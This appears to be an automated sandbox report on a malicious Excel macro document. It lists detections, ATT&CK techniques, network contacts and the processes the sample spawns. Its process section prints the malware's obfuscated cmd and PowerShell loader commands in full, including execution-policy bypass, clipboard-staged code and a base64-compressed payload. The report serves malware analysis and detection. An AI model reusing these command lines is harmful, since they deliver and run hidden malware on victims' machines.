Loading ...

Play interactive tourEdit tour

Analysis Report 20310_011_11353_0_88.xls

Overview

General Information

Joe Sandbox Version:25.0.0 Tiger's Eye
Analysis ID:740517
Start date:13.12.2018
Start time:21:39:19
Joe Sandbox Product:Cloud
Overall analysis duration:0h 3m 40s
Localized Internet Anonymization:Successful Pool ID 'Italy'
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:20310_011_11353_0_88.xls
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:9
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal84.expl.evad.winXLS@13/18@1/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .xls
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

StrategyScoreRangeReportingDetection
Threshold840 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsCommand-Line Interface21Winlogon Helper DLLProcess Injection1Disabling Security Tools1Credential DumpingProcess Discovery1Application Deployment SoftwareClipboard Data1Data Encrypted1Standard Non-Application Layer Protocol2
Replication Through Removable MediaPowerShell2Port MonitorsAccessibility FeaturesProcess Injection1Network SniffingSecurity Software Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Application Layer Protocol2
Drive-by CompromiseScripting12Accessibility FeaturesPath InterceptionDeobfuscate/Decode Files or Information1Input CaptureRemote System Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic Protocol
Exploit Public-Facing ApplicationExploitation for Client Execution13System FirmwareDLL Search Order HijackingScripting12Credentials in FilesFile and Directory Discovery1Logon ScriptsInput CaptureData EncryptedMultiband Communication
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessObfuscated Files or Information1Account ManipulationSystem Information Discovery21Shared WebrootData StagedScheduled TransferStandard Cryptographic Protocol

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for submitted fileShow sources
Source: 20310_011_11353_0_88.xlsAvira: Label: VBA/Dldr.Agent.yogrg
Multi AV Scanner detection for submitted fileShow sources
Source: 20310_011_11353_0_88.xlsvirustotal: Detection: 22%Perma Link
Yara signature matchShow sources
Source: 00000006.00000002.1249360856.012C0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000002.1249342410.006B0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1264839354.01CC0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1248635443.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000003.1249027719.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1263643081.01290000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1263634948.01287000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1248720839.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1248969895.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1263500876.00400000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1263628810.01280000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000000.1248315695.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000006.00000002.1249262618.00340000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000008.00000002.1264845731.01CC7000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exeJump to behavior
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: images2.imgbox.com
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.1.81:49211 -> 64.210.135.68:443
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.1.81:49211 -> 64.210.135.68:443

Networking:

barindex
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 64.210.135.68 64.210.135.68
Found strings which match to known social media urlsShow sources
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: images2.imgbox.com
Urls found in memory or binary dataShow sources
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0#
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000008.00000002.1264881981.01D0F000.00000004.sdmpString found in binary or memory: https://i.imgur.com/Hz99iZp.png
Source: powershell.exe, 00000008.00000002.1264881981.01D0F000.00000004.sdmpString found in binary or memory: https://images2.imgbox.com
Source: powershell.exe, 00000008.00000002.1262983725.00108000.00000004.sdmpString found in binary or memory: https://images2.imgbox.com/43/d7/RDjs3JCK_o.png
Source: powershell.exe, 00000008.00000002.1264881981.01D0F000.00000004.sdmpString found in binary or memory: https://images2.imgbox.com/43/d7/RDjs3JCK_o.pngH
Source: powershell.exe, 00000008.00000002.1276023796.0416C000.00000004.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49211
Source: unknownNetwork traffic detected: HTTP traffic on port 49211 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilitiesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

System Summary:

barindex
Powershell connects to networkShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 64.210.135.68 443Jump to behavior
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 7783
Source: unknownProcess created: Commandline size = 2530
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: Commandline size = 7783Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2530Jump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\2\BaseNamedObjects\Global\.net clr networking
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: 20310_011_11353_0_88.xlsOLE, VBA macro line: Sub Workbook_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_OpenName: Workbook_Open
Document contains embedded VBA macrosShow sources
Source: 20310_011_11353_0_88.xlsOLE indicator, VBA macros: true
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal84.expl.evad.winXLS@13/18@1/1
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\ExcelJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\CVR1594.tmpJump to behavior
Document contains an OLE Workbook stream indicating a Microsoft Excel fileShow sources
Source: 20310_011_11353_0_88.xlsOLE indicator, Workbook stream: true
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\clip.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: 20310_011_11353_0_88.xlsvirustotal: Detection: 22%
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'nt
Source: unknownProcess created: C:\Windows\System32\cmd.exe Cmd /C %QJi:''='%
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'
Source: unknownProcess created: C:\Windows\System32\clip.exe cLiP
Source: unknownProcess created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'ntJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /C %QJi:''='%Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\clip.exe cLiPJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000008.00000002.1275888570.040D0000.00000002.sdmp
Document has a 'lastprinted' value indicative of goodwareShow sources
Source: 20310_011_11353_0_88.xlsInitial sample: OLE summary lastprinted = 2014-11-21 11:09:31

Data Obfuscation:

barindex
Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
Source: 20310_011_11353_0_88.xlsStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : High number of string operations
Obfuscated command line foundShow sources
